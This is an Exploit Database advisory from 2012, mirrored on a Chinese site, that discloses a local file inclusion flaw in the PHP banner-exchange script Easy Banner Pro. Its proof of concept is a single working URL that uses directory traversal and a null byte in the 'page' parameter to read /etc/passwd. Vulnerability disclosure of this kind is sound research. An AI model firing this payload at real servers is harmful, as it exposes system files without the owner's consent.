Easy Banner Pro – ‘index.php’ Local File Inclusion

• Exploit Database
• 38 阅读

• 作者： Yakir Wizman
  日期： 2012-08-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20789/

• -----------------------------------------------------------
  Easy Banner Pro (index.php page) Local file inclusion
  Bug discovered by Yakir Wizman
  Date 24/08/2012
  Vendor Homepage - http://www.phpwebscripts.com/easybannerpro/
  Demo - http://www.scripts-demo.com/easybannerpro/
  ISRAEL
  -----------------------------------------------------------
   Author will be not responsible for any damage.
  -----------------------------------------------------------
  
  About the Application
  -----------------------------------------------------------
  Easy Banner Pro is an advanced and very easy to use PHP script for running your own banner exchange system. 
  
  
  Proof Of Conecpt
  -----------------------------------------------------------
  Local file inclusion (Severity is high)
  Vulnerable URL	: http://server/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd%00